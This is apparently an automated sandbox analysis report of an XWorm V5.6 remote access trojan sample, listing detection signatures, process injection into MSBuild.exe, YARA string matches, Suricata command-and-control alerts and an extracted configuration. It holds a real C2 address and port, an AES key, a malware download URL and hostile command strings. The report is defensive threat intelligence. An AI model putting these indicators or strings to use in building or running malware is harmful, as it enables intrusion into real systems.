
Windows Analysis Report
v4mNsTzbsL.exe

Overview

General Information

Sample name: v4mNsTzbsL.exe
(renamed because the original name is a hash value)
Original sample name: 7da3802f280128d411770f88e0e898986704ce2ef4772e914bf52ecb67093dbe.exe
Analysis ID: 1640799
MD5: 36d00030ef6be50ff0bc63f1002cf72b
SHA1: 8f32e08489609151f7a14e67071722727984857d
SHA256: 7da3802f280128d411770f88e0e898986704ce2ef4772e914bf52ecb67093dbe
Tags: 92-255-85-2, booking, clickfix, exe, fakecaptcha, SPAM-ITA, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

  • System is w10x64
  • v4mNsTzbsL.exe (PID: 8872 cmdline: "C:\Users\user\Desktop\v4mNsTzbsL.exe" MD5: 36D00030EF6BE50FF0BC63F1002CF72B)
    • MSBuild.exe (PID: 8920 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
dump.pcap | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe6126:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe61c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe62d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe5f98:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x6a80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x68f2:$cnc4: POST / HTTP/1.1
00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      • 0x70f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x103c0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7191:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1045d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x72a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10572:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6f66:$cnc4: POST / HTTP/1.1
      • 0x10232:$cnc4: POST / HTTP/1.1
00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author | Strings
1.2.MSBuild.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
1.2.MSBuild.exe.400000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
          • 0x58a9:$str01: $VB$Local_Port
          • 0x589a:$str02: $VB$Local_Host
          • 0x5ba0:$str03: get_Jpeg
          • 0x5552:$str04: get_ServicePack
          • 0x6546:$str05: Select * from AntivirusProduct
          • 0x6744:$str06: PCRestart
          • 0x6758:$str07: shutdown.exe /f /r /t 0
          • 0x680a:$str08: StopReport
          • 0x67e0:$str09: StopDDos
          • 0x68d6:$str10: sendPlugin
          • 0x6956:$str11: OfflineKeylogger Not Enabled
          • 0x6aae:$str12: -ExecutionPolicy Bypass -File "
          • 0x6bd7:$str13: Content-length: 5235
1.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
0.2.v4mNsTzbsL.exe.2ceef48.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.v4mNsTzbsL.exe.2ceef48.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
            • 0x3aa9:$str01: $VB$Local_Port
            • 0x3a9a:$str02: $VB$Local_Host
            • 0x3da0:$str03: get_Jpeg
            • 0x3752:$str04: get_ServicePack
            • 0x4746:$str05: Select * from AntivirusProduct
            • 0x4944:$str06: PCRestart
            • 0x4958:$str07: shutdown.exe /f /r /t 0
            • 0x4a0a:$str08: StopReport
            • 0x49e0:$str09: StopDDos
            • 0x4ad6:$str10: sendPlugin
            • 0x4b56:$str11: OfflineKeylogger Not Enabled
            • 0x4cae:$str12: -ExecutionPolicy Bypass -File "
            • 0x690e:$str12: -ExecutionPolicy Bypass -File "
            • 0x4dd7:$str13: Content-length: 5235
            • 0x6a37:$str13: Content-length: 5235
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T18:39:13.686271+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49722 | 92.255.85.2 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T18:39:23.423578+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:39:32.712762+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:39:46.952483+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:39:53.430290+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:01.200759+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:15.430684+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:22.036220+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:23.423451+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:26.425933+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:26.586380+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:26.764737+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:31.581712+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:31.753001+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:32.098611+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:37.425003+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:42.227487+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:47.979773+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:48.153613+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:53.931861+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:54.159271+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:40:56.670541+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:04.152966+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:05.102070+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:09.367440+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:14.791762+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:20.769750+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:21.566171+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:23.433582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:24.096530+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:38.335284+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:41.272098+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:43.445246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:43.638718+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:53.324340+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:53.539885+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:55.165962+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:58.975392+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:59.143194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:41:59.317952+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:08.470663+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:15.333680+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:15.518092+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:22.660726+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:23.439809+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:24.558304+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:31.686161+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:37.600373+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:37.774522+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:37.963016+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:39.495850+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:40.335327+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:40.853407+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:53.439748+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:55.074381+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:42:58.644393+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:43:04.272022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:43:04.316925+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:43:09.330566+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:43:16.931813+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
2025-03-17T18:43:19.478268+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T18:39:32.720736+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:39:46.955435+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:01.203244+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:15.433563+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:22.037904+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:26.437902+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:26.588691+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:26.766432+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:31.583459+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:31.759112+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:31.920124+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:31.926587+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:32.099944+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:37.426415+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:42.272921+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:47.982591+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:48.155138+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:53.933351+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:40:56.672657+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:04.155044+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:05.104121+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:09.370830+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:14.793762+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:20.771950+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:21.572423+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:21.791326+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:21.796200+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:24.098191+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:38.347938+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:41.273495+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:43.448742+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:43.641041+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:43.825345+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:43.835230+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:53.325966+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:55.167540+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:58.976870+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:59.144538+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:41:59.319761+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:08.472408+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:15.335580+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:15.523618+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:22.662765+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:24.560281+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:31.687728+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:37.602073+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:37.778150+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:37.967045+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:39.664477+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:40.337070+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:40.855185+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:55.077647+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:42:58.645919+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:04.273513+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:04.318264+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:04.543122+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:04.549782+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:09.346722+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:16.935939+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
2025-03-17T18:43:19.482317+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T18:39:23.423578+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.5 | 49723 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T18:41:20.480746+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 92.255.85.2 | 4372 | TCP


AV Detection

Source: http://92.255.85.2/pq.exe | Avira URL Cloud: Label: malware
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["92.255.85.2"], "Port": 4372, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: v4mNsTzbsL.exe | Virustotal: Detection: 50%
Source: v4mNsTzbsL.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 92.255.85.2
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 4372
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: P0WER
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm V5.6
Source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
Source: v4mNsTzbsL.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.85.2:4372 -> 192.168.2.5:49723
Source: Network traffic | Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.85.2:4372 -> 192.168.2.5:49723
